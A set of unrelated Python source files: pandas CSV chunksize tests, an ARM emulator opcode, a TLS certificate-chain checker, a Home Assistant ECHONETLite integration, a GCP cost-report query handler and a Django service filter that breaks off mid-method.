X_train = df_ml_train[X_cols]
y_train = df_ml_train[y_cols]
models = []
models.append(['high', make_model(X_train, y_train, quantile=0.90)])
models.append(['base', make_model(X_train, y_train, quantile=0.50)])
models.append(['low', make_model(X_train, y_train, quantile=0.10)])
return models
def make_predictions(models, df_ml, X_cols, y_cols):
df_pred = df_ml.copy()
""" Use trained models to make predictions, add on to df_ml as new columns """
X = df_pred[X_cols]
for name, model in models:
y_pred = model.predict(X)
pred_cols = [c + '_pred_'+name for c in y_cols]
df_pred[pred_cols] = pd.DataFrame(y_pred, index=df_pred.index)
return df_pred
|
"""
Tests that work on both the Python and C engines but do not have a
specific classification into the other test modules.
"""
from io import StringIO
import numpy as np
import pytest
from pandas.errors import DtypeWarning
from pandas import (
DataFrame,
concat,
)
import pandas._testing as tm
pytestmark = pytest.mark.usefixtures("pyarrow_skip")
@pytest.mark.parametrize("index_col", [0, "index"])
def test_read_chunksize_with_index(all_parsers, index_col):
parser = all_parsers
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
expected = DataFrame(
[
["foo", 2, 3, 4, 5],
["bar", 7, 8, 9, 10],
["baz", 12, 13, 14, 15],
["qux", 12, 13, 14, 15],
["foo2", 12, 13, 14, 15],
["bar2", 12, 13, 14, 15],
],
columns=["index", "A", "B", "C", "D"],
)
expected = expected.set_index("index")
with parser.read_csv(StringIO(data), index_col=0, chunksize=2) as reader:
chunks = list(reader)
tm.assert_frame_equal(chunks[0], expected[:2])
tm.assert_frame_equal(chunks[1], expected[2:4])
tm.assert_frame_equal(chunks[2], expected[4:])
@pytest.mark.parametrize("chunksize", [1.3, "foo", 0])
def test_read_chunksize_bad(all_parsers, chunksize):
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
parser = all_parsers
msg = r"'chunksize' must be an integer >=1"
with pytest.raises(ValueError, match=msg):
with parser.read_csv(StringIO(data), chunksize=chunksize) as _:
pass
@pytest.mark.parametrize("chunksize", [2, 8])
def test_read_chunksize_and_nrows(all_parsers, chunksize):
# see gh-15755
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
parser = all_parsers
kwargs = {"index_col": 0, "nrows": 5}
expected = parser.read_csv(StringIO(data), **kwargs)
with parser.read_csv(StringIO(data), chunksize=chunksize, **kwargs) as reader:
tm.assert_frame_equal(concat(reader), expected)
def test_read_chunksize_and_nrows_changing_size(all_parsers):
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
parser = all_parsers
kwargs = {"index_col": 0, "nrows": 5}
expected = parser.read_csv(StringIO(data), **kwargs)
with parser.read_csv(StringIO(data), chunksize=8, **kwargs) as reader:
tm.assert_frame_equal(reader.get_chunk(size=2), expected.iloc[:2])
tm.assert_frame_equal(reader.get_chunk(size=4), expected.iloc[2:5])
with pytest.raises(StopIteration, match=""):
reader.get_chunk(size=3)
def test_get_chunk_passed_chunksize(all_parsers):
parser = all_parsers
data = """A,B,C
1,2,3
4,5,6
7,8,9
1,2,3"""
with parser.read_csv(StringIO(data), chunksize=2) as reader:
result = reader.get_chunk()
expected = DataFrame([[1, 2, 3], [4, 5, 6]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [{}, {"index_col": 0}])
def test_read_chunksize_compat(all_parsers, kwargs):
# see gh-12185
data = """index,A,B,C,D
foo,2,3,4,5
bar,7,8,9,10
baz,12,13,14,15
qux,12,13,14,15
foo2,12,13,14,15
bar2,12,13,14,15
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), **kwargs)
with parser.read_csv(StringIO(data), chunksize=2, **kwargs) as reader:
tm.assert_frame_equal(concat(reader), result)
def test_read_chunksize_jagged_names(all_parsers):
# see gh-23509
parser = all_parsers
data = "\n".join(["0"] * 7 + [",".join(["0"] * 10)])
expected = DataFrame([[0] + [np.nan] * 9] * 7 + [[0] * 10])
with parser.read_csv(StringIO(data), names=range(10), chunksize=4) as reader:
result = concat(reader)
tm.assert_frame_equal(result, expected)
def test_chunk_begins_with_newline_whitespace(all_parsers):
# see gh-10022
parser = all_parsers
data = "\n hello\nworld\n"
result = parser.read_csv(StringIO(data), header=None)
expected = DataFrame([" hello", "world"])
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_chunks_have_consistent_numerical_type(all_parsers):
parser = all_parsers
integers = [str(i) for i in range(499999)]
data = "a\n" + "\n".join(integers + ["1.0", "2.0"] + integers)
# Coercions should work without warnings.
with tm.assert_produces_warning(None):
result = parser.read_csv(StringIO(data))
assert type(result.a[0]) is np.float64
assert result.a.dtype == float
def test_warn_if_chunks_have_mismatched_type(all_parsers):
warning_type = None
parser = all_parsers
size = 10000
# see gh-3866: if chunks are different types and can't
# be coerced using numerical types, then issue warning.
if parser.engine == "c" and parser.low_memory:
warning_type = DtypeWarning
# Use larger size to hit warning path
size = 499999
integers = [str(i) for i in range(size)]
data = "a\n" + "\n".join(integers + ["a", "b"] + integers)
buf = StringIO(data)
with tm.assert_produces_warning(warning_type):
df = parser.read_csv(buf)
assert df.a.dtype == object
@pytest.mark.parametrize("iterator", [True, False])
def test_empty_with_nrows_chunksize(all_parsers, iterator):
# see gh-9535
parser = all_parsers
expected = DataFrame(columns=["foo", "bar"])
nrows = 10
data = StringIO("foo,bar\n")
if iterator:
with parser.read_csv(data, chunksize=nrows) as reader:
result = next(iter(reader))
else:
result = parser.read_csv(data, nrows=nrows)
tm.assert_frame_equal(result, expected)
def test_read_csv_memory_growth_chunksize(all_parsers):
# see gh-24805
#
# Let's just make sure that we don't crash
# as we iteratively process all chunks.
parser = all_parsers
with tm.ensure_clean() as path:
with open(path, "w") as f:
for i in range(1000):
f.write(str(i) + "\n")
with parser.read_csv(path, chunksize=20) as result:
for _ in result:
pass
def test_chunksize_with_usecols_second_block_shorter(all_parsers):
# GH#21211
parser = all_parsers
data = """1,2,3,4
5,6,7,8
9,10,11
"""
result_chunks = parser.read_csv(
StringIO(data),
names=["a", "b"],
chunksize=2,
usecols=[0, 1],
header=None,
)
expected_frames = [
DataFrame({"a": [1, 5], "b": [2, 6]}),
DataFrame({"a": [9], "b": [10]}, index=[2]),
]
for i, result in enumerate(result_chunks):
tm.assert_frame_equal(result, expected_frames[i])
def test_chunksize_second_block_shorter(all_parsers):
# GH#21211
parser = all_parsers
data = """a,b,c,d
1,2,3,4
5,6,7,8
9,10,11
"""
result_chunks = parser.read_csv(StringIO(data), chunksize=2)
expected_frames = [
DataFrame({"a": [1, 5], "b": [2, 6], "c": [3, 7], "d": [4, 8]}),
DataFrame({"a": [9], "b": [10], "c": [11], "d": [np.nan]}, index=[2]),
]
for i, result in enumerate(result_chunks):
tm.assert_frame_equal(result, expected_frames[i])
|
from armulator.armv6.opcodes.abstract_opcodes.sub_register import SubRegister
from armulator.armv6.opcodes.opcode import Opcode
from armulator.armv6.shift import SRType
class SubRegisterT1(SubRegister, Opcode):
def __init__(self, instruction, setflags, m, d, n, shift_t, shift_n):
Opcode.__init__(self, instruction)
SubRegister.__init__(self, setflags, m, d, n, shift_t, shift_n)
def is_pc_changing_opcode(self):
return self.d == 15
@staticmethod
def from_bitarray(instr, processor):
rd = instr[13:16]
rn = instr[10:13]
rm = instr[7:10]
set_flags = not processor.in_it_block()
shift_t = SRType.SRType_LSL
shift_n = 0
return SubRegisterT1(instr, **{"setflags": set_flags, "m": rm.uint, "d": rd.uint, "n": rn.uint,
"shift_t": shift_t, "shift_n": shift_n})
|
import datetime
import select
import socket
import sys
import OpenSSL
import json
class Domain(str):
def __new__(cls, domain):
host = domain
port = 443
connection_host = host
result = str.__new__(cls, host)
result.host = host
result.connection_host = connection_host
result.port = port
return result
class CertChecker:
def __init__(self):
pass
def get_cert_from_domain(self, domain):
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)
sock = socket.socket()
sock.settimeout(5)
wrapped_sock = OpenSSL.SSL.Connection(ctx, sock)
wrapped_sock.set_tlsext_host_name(domain.host.encode('ascii'))
wrapped_sock.connect((domain.connection_host, 443))
while True:
try:
wrapped_sock.do_handshake()
break
except OpenSSL.SSL.WantReadError:
select.select([wrapped_sock], [], [])
return wrapped_sock.get_peer_cert_chain()
def get_domain_certs(self, domains):
domain = Domain(domains)
try:
data = self.get_cert_from_domain(domain)
except Exception as e:
data = e
return data
def validate_cert(self, cert_chain):
msgs = []
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)
ctx.set_default_verify_paths()
cert_store = ctx.get_cert_store()
for index, cert in reversed(list(enumerate(cert_chain))):
sc = OpenSSL.crypto.X509StoreContext(cert_store, cert)
try:
sc.verify_certificate()
except OpenSSL.crypto.X509StoreContextError as e:
msgs.append(
('error', "Validation error '%s'." % e))
if index > 0:
cert_store.add_cert(cert)
return msgs
def check(self, domain,domain_certs,utcnow):
msgs = []
results = []
earliest_expiration = None
if domain_certs is None: return (msgs, earliest_expiration, None)
if isinstance(domain_certs, Exception):
domain_certs = "".join(traceback.format_exception_only(type(domain_certs),domain_certs)).strip()
msgs = self.validate_cert(domain_certs)
for i, cert in enumerate(domain_certs):
result = {}
subject = cert.get_subject().commonName
result["subject"] = subject
expires = datetime.datetime.strptime(cert.get_notAfter().decode('ascii'), '%Y%m%d%H%M%SZ')
result["expires"] = str(expires)
if expires:
if earliest_expiration is None or expires < earliest_expiration:
earliest_expiration = expires
issued_level = "info"
issuer = cert.get_issuer().commonName
if issuer:
if issuer.lower() == "happy hacker fake ca":
issued_level = "error"
else:
issued_level = 'warning'
msgs.append((issued_level, "Issued by: %s (subject: %s)" % (issuer, subject)))
result["issuer"] = issuer
results.append(result)
if i < len(domain_certs) - 1:
sign_cert = domain_certs[i+1]
subject = sign_cert.get_subject().commonName
if issuer != subject:
msgs.append(
('error', "The certificate sign chain subject '%s' doesn't match the issuer '%s'." % (subject, issuer)))
sig_alg = cert.get_signature_algorithm()
if sig_alg.startswith(b'sha1'):
msgs.append(('error', "Unsecure signature algorithm %s (subject: %s)" % (sig_alg, subject)))
if expires < utcnow:
msgs.append(
('error', "The certificate has expired on %s (subject: %s)" % (expires, subject)))
elif expires < (utcnow + datetime.timedelta(days=15)):
msgs.append(
('warning', "The certificate expires on %s (%s) (subject: %s)" % (
expires, expires - utcnow, subject)))
else:
delta = ((expires - utcnow) // 60 // 10 ** 6) * 60 * 10 ** 6
msgs.append(
('info', "Valid until %s (%s)." % (expires, delta)))
return (msgs, earliest_expiration, results)
def checkCertChain(self, domain):
domain = domain.replace("http://","")
domain = domain.replace("https://","")
domain = domain.split('/')[0]
domain_certs = self.get_domain_certs(domain)
if isinstance(domain_certs, Exception):
output = {
"result": "Invalid",
"errors": ["Unable to obtain certficate chain"],
"warnings": [],
"details": []
}
return output
utcnow = datetime.datetime.now()
(msgs, earliest_expiration, results) = self.check(domain,domain_certs,utcnow)
warnings = []
output = {}
output["details"] = results
errors = []
for level, msg in msgs:
if level == 'error':
errors.append(msg)
elif level == 'warning':
warnings.append(msg)
output["errors"] = errors
output["warnings"] = warnings
if len(errors) > 0:
output["result"] = "Invalid"
elif len(warnings) > 0:
output["result"] = "Valid (with Warnings)"
else: output["result"] = "Valid"
return output
|
"""The echonetlite integration."""
from __future__ import annotations
import logging
import pychonet as echonet
from pychonet.lib.epc import EPC_SUPER, EPC_CODE
from pychonet.lib.const import VERSION
from datetime import timedelta
import asyncio
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.util import Throttle
from .const import DOMAIN, USER_OPTIONS, TEMP_OPTIONS
from aioudp import UDPServer
from pychonet import ECHONETAPIClient
from pychonet.EchonetInstance import (
ENL_GETMAP,
ENL_SETMAP,
ENL_UID,
ENL_STATUS,
ENL_INSTANTANEOUS_POWER,
ENL_CUMULATIVE_POWER
)
from pychonet.HomeAirConditioner import (
ENL_FANSPEED,
ENL_AUTO_DIRECTION,
ENL_SWING_MODE,
ENL_AIR_VERT,
ENL_AIR_HORZ,
ENL_HVAC_MODE,
ENL_HVAC_SET_TEMP,
ENL_HVAC_ROOM_HUMIDITY,
ENL_HVAC_ROOM_TEMP,
ENL_HVAC_SILENT_MODE,
ENL_HVAC_OUT_TEMP
)
from pychonet.GeneralLighting import (
ENL_BRIGHTNESS,
ENL_COLOR_TEMP
)
_LOGGER = logging.getLogger(__name__)
PLATFORMS = ["sensor", 'climate', 'select', 'light', 'fan', 'switch']
PARALLEL_UPDATES = 0
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=60)
MAX_UPDATE_BATCH_SIZE = 10
HVAC_API_CONNECTOR_DEFAULT_FLAGS = [
ENL_STATUS, ENL_FANSPEED, ENL_AUTO_DIRECTION, ENL_SWING_MODE, ENL_AIR_VERT, ENL_AIR_HORZ, ENL_HVAC_MODE,
ENL_HVAC_SET_TEMP, ENL_HVAC_ROOM_HUMIDITY, ENL_HVAC_ROOM_TEMP, ENL_HVAC_OUT_TEMP, ENL_HVAC_SILENT_MODE,
ENL_INSTANTANEOUS_POWER, ENL_CUMULATIVE_POWER
]
LIGHT_API_CONNECTOR_DEFAULT_FLAGS = [
ENL_STATUS, ENL_BRIGHTNESS, ENL_COLOR_TEMP
]
# fix later
_0287_API_CONNECTOR_DEFAULT_FLAGS = [ENL_STATUS, 0xC0, 0xC1, 0xC2, 0xC5, 0xC6, 0xC7, 0xC8]
def polling_update_debug_log(values, eojgc, eojcc):
debug_log = f"\nECHONETlite polling update data:\n"
for value in list(values.keys()):
if value in EPC_CODE[eojgc][eojcc]:
debug_log = debug_log + f' - {EPC_CODE[eojgc][eojcc][value]} ({value:#x}): {values[value]}\n'
if value in EPC_SUPER:
debug_log = debug_log + f' - {EPC_SUPER[value]} ({value:#x}): {values[value]}\n'
return debug_log
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
entry.async_on_unload(entry.add_update_listener(update_listener))
host = None
udp = None
loop = None
server = None
if DOMAIN in hass.data: # maybe set up by config entry?
_LOGGER.debug(f"ECHONETlite platform is already started.")
server = hass.data[DOMAIN]['api']
hass.data[DOMAIN].update({entry.entry_id: []})
else: # setup API
_LOGGER.debug(f"Starting up ECHONETlite platform..")
_LOGGER.debug(f"pychonet version is {VERSION}")
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN].update({entry.entry_id: []})
udp = UDPServer()
loop = asyncio.get_event_loop()
udp.run("0.0.0.0", 3610, loop=loop)
server = ECHONETAPIClient(server=udp, loop=loop)
server._message_timeout = 300
hass.data[DOMAIN].update({"api": server})
for instance in entry.data["instances"]:
echonetlite = None
host = instance["host"]
eojgc = instance["eojgc"]
eojcc = instance["eojcc"]
eojci = instance["eojci"]
getmap = instance["getmap"]
setmap = instance["setmap"]
uid = instance["uid"]
# manually update API states using config entry data
if host not in list(server._state):
server._state[host] = {
"instances": {
eojgc: {
eojcc: {
eojci: {
ENL_SETMAP: setmap,
ENL_GETMAP: getmap,
ENL_UID: uid
}
}
}
}
}
if eojgc not in list(server._state[host]["instances"]):
server._state[host]["instances"].update({
eojgc: {
eojcc: {
eojci: {
ENL_SETMAP: setmap,
ENL_GETMAP: getmap,
ENL_UID: uid
}
}
}
})
if eojcc not in list(server._state[host]["instances"][eojgc]):
server._state[host]["instances"][eojgc].update({
eojcc: {
eojci: {
ENL_SETMAP: setmap,
ENL_GETMAP: getmap,
ENL_UID: uid
}
}
})
if eojci not in list(server._state[host]["instances"][eojgc][eojcc]):
server._state[host]["instances"][eojgc][eojcc].update({
eojci: {
ENL_SETMAP: setmap,
ENL_GETMAP: getmap,
ENL_UID: uid
}
})
echonetlite = ECHONETConnector(instance, hass.data[DOMAIN]['api'], entry)
await echonetlite.async_update()
hass.data[DOMAIN][entry.entry_id].append({"instance": instance, "echonetlite": echonetlite})
_LOGGER.debug(f"Plaform entry data - {entry.data}")
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
# TODO update for Air Cleaner
async def update_listener(hass, entry):
for instance in hass.data[DOMAIN][entry.entry_id]:
if instance['instance']['eojgc'] == 1 and instance['instance']['eojcc'] == 48:
for option in USER_OPTIONS.keys():
if entry.options.get(USER_OPTIONS[option]["option"]) is not None: # check if options has been created
if len(entry.options.get(USER_OPTIONS[option]["option"])) > 0: # if it has been created then check list length.
instance["echonetlite"]._user_options.update({option: entry.options.get(USER_OPTIONS[option]["option"])})
else:
instance["echonetlite"]._user_options.update({option: False})
for option in TEMP_OPTIONS.keys():
if entry.options.get(option) is not None:
instance["echonetlite"]._user_options.update({option: entry.options.get(option)})
class ECHONETConnector():
"""EchonetAPIConnector is used to centralise API calls for Echonet devices.
API calls are aggregated per instance (not per node!)"""
def __init__(self, instance, api, entry):
self._host = instance['host']
self._instance = None
self._eojgc = instance['eojgc']
self._eojcc = instance['eojcc']
self._eojci = instance['eojci']
self._update_flag_batches = []
self._update_data = {}
self._api = api
self._getPropertyMap = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_GETMAP]
self._setPropertyMap = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_SETMAP]
self._manufacturer = None
if "manufacturer" in instance:
self._manufacturer = instance["manufacturer"]
# Detect HVAC - eventually we will use factory here.
self._update_flags_full_list = []
flags = []
if self._eojgc == 0x01 and self._eojcc == 0x30:
_LOGGER.debug(f"Starting ECHONETLite HomeAirConditioner instance at {self._host}")
flags = HVAC_API_CONNECTOR_DEFAULT_FLAGS
elif self._eojgc == 0x02 and self._eojcc == 0x90:
_LOGGER.debug(f"Starting ECHONETLite GeneralLighting instance at {self._host}")
flags = LIGHT_API_CONNECTOR_DEFAULT_FLAGS
elif self._eojgc == 0x02 and self._eojcc == 0x87:
_LOGGER.debug(f"Starting ECHONETLite DistributionPanelMeter instance at {self._host}")
flags = _0287_API_CONNECTOR_DEFAULT_FLAGS
else:
_LOGGER.debug(f"Starting ECHONETLite Generic instance for {self._eojgc}-{self._eojcc}-{self._eojci} at {self._host}")
flags = [ENL_STATUS]
for item in self._getPropertyMap:
if item not in list(EPC_SUPER.keys()):
if item in list(EPC_CODE[self._eojgc][self._eojcc].keys()):
flags.append(item)
for value in flags:
if value in self._getPropertyMap:
self._update_flags_full_list.append(value)
self._update_data[value] = None
self._instance = echonet.Factory(self._host, self._api, self._eojgc, self._eojcc, self._eojci)
# Split list of codes into batches of 10
start_index = 0
full_list_length = len(self._update_flags_full_list)
while start_index + MAX_UPDATE_BATCH_SIZE < full_list_length:
self._update_flag_batches.append(self._update_flags_full_list[start_index:start_index+MAX_UPDATE_BATCH_SIZE])
start_index += MAX_UPDATE_BATCH_SIZE
self._update_flag_batches.append(self._update_flags_full_list[start_index:full_list_length])
# TODO this looks messy.
self._user_options = {
ENL_FANSPEED: False,
ENL_AUTO_DIRECTION: False,
ENL_SWING_MODE: False,
ENL_AIR_VERT: False,
ENL_AIR_HORZ: False,
'min_temp_heat': 15,
'max_temp_heat': 35,
'min_temp_cool': 15,
'max_temp_cool': 35,
'min_temp_auto': 15,
'max_temp_auto': 35,
}
# User selectable options for fan + swing modes for HVAC
for option in USER_OPTIONS.keys():
if entry.options.get(USER_OPTIONS[option]['option']) is not None: # check if options has been created
if len(entry.options.get(USER_OPTIONS[option]['option'])) > 0: # if it has been created then check list length.
self._user_options[option] = entry.options.get(USER_OPTIONS[option]['option'])
# Temperature range options for heat, cool and auto modes
for option in TEMP_OPTIONS.keys():
if entry.options.get(option) is not None:
self._user_options[option] = entry.options.get(option)
self._uid = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_UID]
_LOGGER.debug(f'UID for ECHONETLite instance at {self._host} is {self._uid}.')
if self._uid is None:
self._uid = f"{self._host}-{self._eojgc}-{self._eojcc}-{self._eojci}"
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def async_update(self, **kwargs):
for retry in range(1, 4):
update_data = {}
for flags in self._update_flag_batches:
batch_data = await self._instance.update(flags)
if batch_data is not False:
if isinstance(batch_data, dict):
update_data.update(batch_data)
elif len(flags) == 1:
update_data[flags[0]] = batch_data
_LOGGER.debug(polling_update_debug_log(update_data, self._eojgc, self._eojcc))
# check if polling succeeded
polling_succeeded = False
for value in list(update_data.values()):
if value is not None:
polling_succeeded = True
if len(update_data) > 0 and polling_succeeded == True:
# polling succeded.
if retry > 1:
_LOGGER.debug(f"Polling ECHONET Instance host at {self._host} succeeded. Retry {retry} of 3")
self._update_data.update(update_data)
return self._update_data
else:
_LOGGER.debug(f"Polling ECHONET Instance host {self._host} timed out. Retry {retry} of 3")
_LOGGER.debug(f"Number of missed ECHONETLite msssages since reboot is {len(self._api._message_list)}")
self._update_data.update(update_data)
return self._update_data
|
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""GCP Query Handling for Reports."""
import copy
import logging
from django.db.models import F
from django.db.models import Value
from django.db.models.functions import Coalesce
from django.db.models.functions import Concat
from tenant_schemas.utils import tenant_context
from api.models import Provider
from api.report.gcp.provider_map import GCPProviderMap
from api.report.queries import ReportQueryHandler
LOG = logging.getLogger(__name__)
class GCPReportQueryHandler(ReportQueryHandler):
"""Handles report queries and responses for GCP."""
provider = Provider.PROVIDER_GCP
network_services = {
"Network",
"VPC",
"Firewall",
"Route",
"IP",
"DNS",
"CDN",
"NAT",
"Traffic Director",
"Service Discovery",
"Cloud Domains",
"Private Service Connect",
"Cloud Armor",
}
database_services = {"SQL", "Spanner", "Bigtable", "Firestore", "Firebase", "Memorystore", "MongoDB"}
def __init__(self, parameters):
"""Establish GCP report query handler.
Args:
parameters (QueryParameters): parameter object for query
"""
# do not override mapper if its already set
try:
getattr(self, "_mapper")
except AttributeError:
self._mapper = GCPProviderMap(provider=self.provider, report_type=parameters.report_type)
self.group_by_options = self._mapper.provider_map.get("group_by_options")
self._limit = parameters.get_filter("limit")
self.is_csv_output = parameters.accept_type and "text/csv" in parameters.accept_type
# TODO: COST-1986
self.group_by_alias = {"service": "service_alias", "project": "project_name", "gcp_project": "project_name"}
# We need to overwrite the pack keys here to include the credit
# dictionary in the endpoint returns.
gcp_pack_keys = {
"infra_raw": {"key": "raw", "group": "infrastructure"},
"infra_markup": {"key": "markup", "group": "infrastructure"},
"infra_usage": {"key": "usage", "group": "infrastructure"},
"infra_credit": {"key": "credit", "group": "infrastructure"},
"infra_total": {"key": "total", "group": "infrastructure"},
"sup_raw": {"key": "raw", "group": "supplementary"},
"sup_markup": {"key": "markup", "group": "supplementary"},
"sup_usage": {"key": "usage", "group": "supplementary"},
"sup_credit": {"key": "credit", "group": "supplementary"},
"sup_total": {"key": "total", "group": "supplementary"},
"cost_raw": {"key": "raw", "group": "cost"},
"cost_markup": {"key": "markup", "group": "cost"},
"cost_usage": {"key": "usage", "group": "cost"},
"cost_credit": {"key": "credit", "group": "cost"},
"cost_total": {"key": "total", "group": "cost"},
}
gcp_pack_definitions = copy.deepcopy(self._mapper.PACK_DEFINITIONS)
gcp_pack_definitions["cost_groups"]["keys"] = gcp_pack_keys
# super() needs to be called after _mapper and _limit is set
super().__init__(parameters)
self._mapper.PACK_DEFINITIONS = gcp_pack_definitions
@property
def annotations(self):
"""Create dictionary for query annotations.
Returns:
(Dict): query annotations dictionary
"""
units_fallback = self._mapper.report_type_map.get("cost_units_fallback")
annotations = {
"date": self.date_trunc("usage_start"),
"cost_units": Coalesce(self._mapper.cost_units_key, Value(units_fallback)),
}
if self._mapper.usage_units_key:
units_fallback = self._mapper.report_type_map.get("usage_units_fallback")
annotations["usage_units"] = Coalesce(self._mapper.usage_units_key, Value(units_fallback))
fields = self._mapper.provider_map.get("annotations")
for q_param, db_field in fields.items():
annotations[q_param] = Concat(db_field, Value(""))
group_by_fields = self._mapper.provider_map.get("group_by_annotations")
for group_key in self._get_group_by():
if group_by_fields.get(group_key):
for q_param, db_field in group_by_fields[group_key].items():
annotations[q_param] = Concat(db_field, Value(""))
return annotations
def _format_query_response(self):
"""Format the query response with data.
Returns:
(Dict): Dictionary response of query params, data, and total
"""
output = self._initialize_response_output(self.parameters)
output["data"] = self.query_data
output["total"] = self.query_sum
if self._delta:
output["delta"] = self.query_delta
return output
def _build_sum(self, query):
"""Build the sum results for the query."""
sum_units = {}
query_sum = self.initialize_totals()
cost_units_fallback = self._mapper.report_type_map.get("cost_units_fallback")
usage_units_fallback = self._mapper.report_type_map.get("usage_units_fallback")
if query.exists():
sum_annotations = {"cost_units": Coalesce(self._mapper.cost_units_key, Value(cost_units_fallback))}
if self._mapper.usage_units_key:
units_fallback = self._mapper.report_type_map.get("usage_units_fallback")
sum_annotations["usage_units"] = Coalesce(self._mapper.usage_units_key, Value(units_fallback))
sum_query = query.annotate(**sum_annotations).order_by()
units_value = sum_query.values("cost_units").first().get("cost_units", cost_units_fallback)
sum_units = {"cost_units": units_value}
if self._mapper.usage_units_key:
units_value = sum_query.values("usage_units").first().get("usage_units", usage_units_fallback)
sum_units["usage_units"] = units_value
query_sum = self.calculate_total(**sum_units)
else:
sum_units["cost_units"] = cost_units_fallback
if self._mapper.report_type_map.get("annotations", {}).get("usage_units"):
sum_units["usage_units"] = usage_units_fallback
query_sum.update(sum_units)
self._pack_data_object(query_sum, **self._mapper.PACK_DEFINITIONS)
return query_sum
def execute_query(self): # noqa: C901
"""Execute query and return provided data.
Returns:
(Dict): Dictionary response of query params, data, and total
"""
data = []
with tenant_context(self.tenant):
query = self.query_table.objects.filter(self.query_filter)
query_data = query.annotate(**self.annotations)
query_group_by = ["date"] + self._get_group_by()
query_order_by = ["-date"]
query_order_by.extend(self.order) # add implicit ordering
annotations = self._mapper.report_type_map.get("annotations")
for alias_key, alias_value in self.group_by_alias.items():
if alias_key in query_group_by:
annotations[f"{alias_key}_alias"] = F(alias_value)
query_data = query_data.values(*query_group_by).annotate(**annotations)
query_sum = self._build_sum(query)
if self._limit:
query_data = self._group_by_ranks(query, query_data)
if not self.parameters.get("order_by"):
# override implicit ordering when using ranked ordering.
query_order_by[-1] = "rank"
if self._delta:
query_data = self.add_deltas(query_data, query_sum)
is_csv_output = self.parameters.accept_type and "text/csv" in self.parameters.accept_type
def check_if_valid_date_str(date_str):
"""Check to see if a valid date has been passed in."""
import ciso8601
try:
ciso8601.parse_datetime(date_str)
except ValueError:
return False
except TypeError:
return False
return True
order_date = None
for i, param in enumerate(query_order_by):
if check_if_valid_date_str(param):
order_date = param
break
# Remove the date order by as it is not actually used for ordering
if order_date:
sort_term = self._get_group_by()[0]
query_order_by.pop(i)
filtered_query_data = []
for index in query_data:
for key, value in index.items():
if (key == "date") and (value == order_date):
filtered_query_data.append(index)
ordered_data = self.order_by(filtered_query_data, query_order_by)
order_of_interest = []
for entry in ordered_data:
order_of_interest.append(entry.get(sort_term))
# write a special order by function that iterates through the
# rest of the days in query_data and puts them in the same order
# return_query_data = []
sorted_data = [item for x in order_of_interest for item in query_data if item.get(sort_term) == x]
query_data = self.order_by(sorted_data, ["-date"])
else:
# &order_by[cost]=desc&order_by[date]=2021-08-02
query_data = self.order_by(query_data, query_order_by)
if is_csv_output:
if self._limit:
data = self._ranked_list(list(query_data))
else:
data = list(query_data)
else:
groups = copy.deepcopy(query_group_by)
groups.remove("date")
data = self._apply_group_by(list(query_data), groups)
data = self._transform_data(query_group_by, 0, data)
key_order = list(["units"] + list(annotations.keys()))
ordered_total = {total_key: query_sum[total_key] for total_key in key_order if total_key in query_sum}
ordered_total.update(query_sum)
self.query_sum = ordered_total
self.query_data = data
return self._format_query_response()
def calculate_total(self, **units):
"""Calculate aggregated totals for the query.
Args:
units (dict): The units dictionary
Returns:
(dict) The aggregated totals for the query
"""
query_group_by = ["date"] + self._get_group_by()
query = self.query_table.objects.filter(self.query_filter)
query_data = query.annotate(**self.annotations)
query_data = query_data.values(*query_group_by)
aggregates = self._mapper.report_type_map.get("aggregates")
total_query = query.aggregate(**aggregates)
for unit_key, unit_value in units.items():
total_query[unit_key] = unit_value
self._pack_data_object(total_query, **self._mapper.PACK_DEFINITIONS)
return total_query
|
from django.db.models import Exists, OuterRef
from django.db.models.functions import Greatest
from django.utils.translation import gettext_lazy as _
from django_filters import rest_framework as filters
from django_filters.widgets import BooleanWidget
from oauth2_provider.models import AccessToken
from oidc_provider.models import UserConsent
from rest_framework import serializers, viewsets
from services.models import Service
from tunnistamo.api_common import OidcTokenAuthentication, TokenAuth
from tunnistamo.pagination import DefaultPagination
from tunnistamo.utils import TranslatableSerializer
class ServiceSerializer(TranslatableSerializer):
# these are required because of TranslatableSerializer
id = serializers.IntegerField(label='ID', read_only=True)
image = serializers.ImageField(allow_null=True, max_length=100, required=False)
class Meta:
model = Service
fields = ('id', 'name', 'url', 'description', 'image')
def to_representation(self, instance):
data = super().to_representation(instance)
if hasattr(instance, 'consent_given'):
data['consent_given'] = instance.consent_given
return data
class ServiceFilter(filters.FilterSet):
consent_given = filters.Filter(
method='filter_consent_given', widget=BooleanWidget(),
help_text=_('Include only services that have or don\'t have a consent given by the current user. '
'Accepts boolean values "true" and "false".'))
class Meta:
model = Service
fields = ('consent_given',)
def filter_consent_given(self, queryset, name, value):
if 'consent_given' in queryset.query.annotations.keys():
